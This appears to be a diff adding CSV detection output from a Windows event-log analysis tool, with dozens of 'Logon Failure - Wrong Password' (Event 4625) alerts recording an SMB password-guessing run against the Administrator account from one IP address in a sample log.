+2016-09-20 01:50:16.872 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2SmitfyjO4mxqw5E  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.904 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Nrq1g8ktTQbPTXqn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.947 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 943GV3t1muba5IQT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:16.982 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HPVd28zf85AxdGqd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.023 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: D6evoSSxcKkHspuc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: C4fznmrnIdUH7DzG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.099 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AwrrYjUV41P0K5Jh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: z4RBZrALEnH5BKP9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.192 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LU6uWH4gs4iHP7rV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.237 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hCfhZDAH8ufk77zN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.277 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TE9pw4UeRldGeKVc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.312 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Z8PKE05MqxE5TwXT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GIE5fmddOPBbCM3u  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.414 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Pveyo4Czx6KWKCGn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.453 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zPyyHaRnBec7Qg2x  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.486 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: V3b8mudJp5mdkiEW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7Y6mjLaCzR28Q2qK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.563 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dMsNKWEjeCYYQVqw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.605 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: I7c5fENhkwO6QfEU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Cr1wAeMhPgVpwV82  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.692 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fErpp9Ww6LO37C9k  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: CYsNpBsGT5zOKe3p  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.866 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: sgzUk1Dmttm4AQ3s  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.921 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Hp0c3YYyOSJuBHCR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:17.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gkis4H1MIQPHUwqf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.009 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Lb6mH03qKLb8O7Dz  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: J10xEmhRNWfJ5FCI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.093 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5Dujj8A7wwzAwzCp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NVDE3fIoUQfLn3cd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.175 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: UlD48O0XpFUnuSmo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.213 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KyTPKuspADmLpv0L  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.260 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BdIAPiH32ZbmCgTK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1dEiN2xOA4E9Wl5p  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.337 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fBeAez2fLjXB0dk3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.372 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gQ45aeMDc3Snabvv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.420 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QWSYdr4lJlhCLMMW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.462 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RgxHY7072aUCdfa0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.504 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9yKhEodJDTVCGdIG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.597 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Z0odyPQmvkGRNWZF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.630 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: b5uRpG0fxCK75DPV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.666 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: d9dcEzpJRW5YA8Bj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Hv3B9bwB1YIaBa6N  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.743 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lJf9Obml4aVxE5zp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mvnSOaRSkGU6Uf5q  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.808 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JSAkZsZsv0SaLKaO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.847 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: r6rnM6QbwfbbrcGy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.888 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RX0GW7K5wdQJUx4Y  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Xm7CpD5i735McsvS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.959 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bHxjZsnR25J47Ez8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:18.999 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: J1JWj91m79FyykH6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:19.043 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: h9i0GncOzpz5REWp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:19.085 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BODZRJ6G3xxw29VJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:19.127 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SJ2lq4piINfmI7Qe  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:19.167 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NqDeXdOitJ3WY8w4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:19.217 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FnoHQf7QDxoI4tel  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:19.261 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FqkbgrtBa5VFxPry  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:19.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TMD57GtY15bfWBre  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:19.350 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: e3lT9UgWr82PcAjf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:19.388 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SpwhTfFlvvccnI5N  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:19.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 10CfKdnvWf4UVuME  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:19.539 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: YYLMax3okIqntHM1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:19.602 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qk9TPAK51EdVORwY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:19.670 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: aVKRUnNu2nGslW7P  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:19.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZJ2AYRLcMbMVixg6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:19.759 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6Sl9ucxM2Nu3xjNq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:19.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AFeBGB6qA7OaYV7l  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:19.837 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KLUEKG9CzQYsH3Vp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:19.875 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vVZ44YKdRYY59zaC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:19.921 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: umU8pDDZFvvUVsHY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:19.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Nn7rA0uRegtHgaF1  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2dgiakCKweT4GUGD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:20.039 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kptipiLujNVePYfy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
